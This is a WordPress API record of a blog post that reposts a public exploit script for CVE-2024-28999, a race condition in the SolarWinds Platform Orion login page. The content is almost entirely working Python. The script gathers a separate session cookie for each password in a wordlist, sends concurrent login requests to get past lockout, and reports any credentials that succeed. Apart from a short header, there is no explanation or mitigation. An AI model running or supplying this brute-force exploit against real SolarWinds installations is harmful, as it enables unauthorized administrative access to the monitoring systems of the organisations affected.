{"id":57694,"date":"2024-06-26T17:50:18","date_gmt":"2024-06-26T14:50:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179214\/solarwindsplatform20241sr1-racecondition.txt"},"modified":"2024-06-26T17:50:18","modified_gmt":"2024-06-26T14:50:18","slug":"solarwinds-platform-2024-1-sr1-race-condition","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/solarwinds-platform-2024-1-sr1-race-condition\/","title":{"rendered":"SolarWinds Platform 2024.1 SR1 Race Condition"},"content":{"rendered":"<p># Exploit Title: SolarWinds Platform 2024.1 SR1 &#8211; Race Condition<br \/># CVE: CVE-2024-28999<br \/># Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions<br \/># Author: Elhussain Fathy, AKA 0xSphinx<\/p>\n<p>import requests<br \/>import urllib3<br \/>import asyncio<br \/>import aiohttp<br \/>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br \/>http = urllib3.PoolManager(cert_reqs=&#8217;CERT_REQUIRED&#8217;)<\/p>\n<p># host = &#8216;192.168.1.1&#8217;<br \/># username = &#8220;admin&#8221;<br \/># file_path = &#8220;passwords.txt&#8221;<\/p>\n<p>host = input(&#8220;Enter the host: &#8220;)<br \/>username = input(&#8220;Enter the username: &#8220;)<br \/>file_path = input(&#8220;Enter the passwords file path: &#8220;)<br \/>exploited = 0<\/p>\n<p>url = f&#8221;https:\/\/{host}:443\/Orion\/Login.aspx?ReturnUrl=%2F&#8221;<\/p>\n<p>passwords = []with open(file_path, &#8216;r&#8217;) as file:<br \/>for line in file:<br \/>word = line.strip()<br \/>passwords.append(word)<br \/>print(f&#8221;Number of tested passwords: {len(passwords)}&#8221;)<\/p>\n<p>headers = {<br \/>&#8216;Host&#8217;: host,<br \/>}<\/p>\n<p>sessions = []\n<p>for _ in range(len(passwords)):<br \/>response = requests.get(url, headers=headers, verify=False, stream=False)<br \/>cookies = response.headers.get(&#8216;Set-Cookie&#8217;, &#8221;)<br \/>session_id = cookies.split(&#8216;ASP.NET_SessionId=&#8217;)[1].split(&#8216;;&#8217;)[0]sessions.append(session_id)<\/p>\n<p>async def send_request(session, username, password):<br \/>headers = {<br \/>&#8216;Host&#8217;: host, <br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;,<br \/>&#8216;Accept&#8217;: &#8216;text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8&#8217;,<br \/>&#8216;Cookie&#8217;: f&#8217;ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE&#8217;,<br \/>}<\/p>\n<p>data = f&#8217;__EVENTTARGET=ctl00%24BodyContent%24LoginButton&amp;__EVENTARGUMENT=&amp;__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&amp;__VIEWSTATEGENERATOR=01070692&amp;ctl00%24BodyContent%24Username={username}&amp;ctl00%24BodyContent%24Password={password}&#8217;<\/p>\n<p>async with aiohttp.ClientSession() as session:<br \/>async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:<br \/>if response.status == 302:<br \/>global exploited<br \/>exploited = 1<br \/>print(f&#8221;Exploited Successfully Username: {username}, Password: {password}&#8221;)<\/p>\n<p>async def main():<br \/>tasks = []for i in range(len(passwords)):<br \/>session = sessions[i]password = passwords[i]task = asyncio.create_task(send_request(session, username, password))<br \/>tasks.append(task)<br \/>await asyncio.gather(*tasks)<\/p>\n<p>asyncio.run(main())<\/p>\n<p>if(not exploited):<br \/>print(&#8220;Exploitation Failed&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: SolarWinds Platform 2024.1 SR1 &#8211; Race Condition# CVE: CVE-2024-28999# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions# Author: Elhussain Fathy, AKA 0xSphinx import requestsimport urllib3import asyncioimport aiohttpurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)http = urllib3.PoolManager(cert_reqs=&#8217;CERT_REQUIRED&#8217;) # host = &#8216;192.168.1.1&#8217;# username = &#8220;admin&#8221;# file_path = &#8220;passwords.txt&#8221; host = input(&#8220;Enter the host: &#8220;)username = input(&#8220;Enter the username: &#8220;)file_path &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57694","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57694","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57694"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57694\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57694"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57694"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}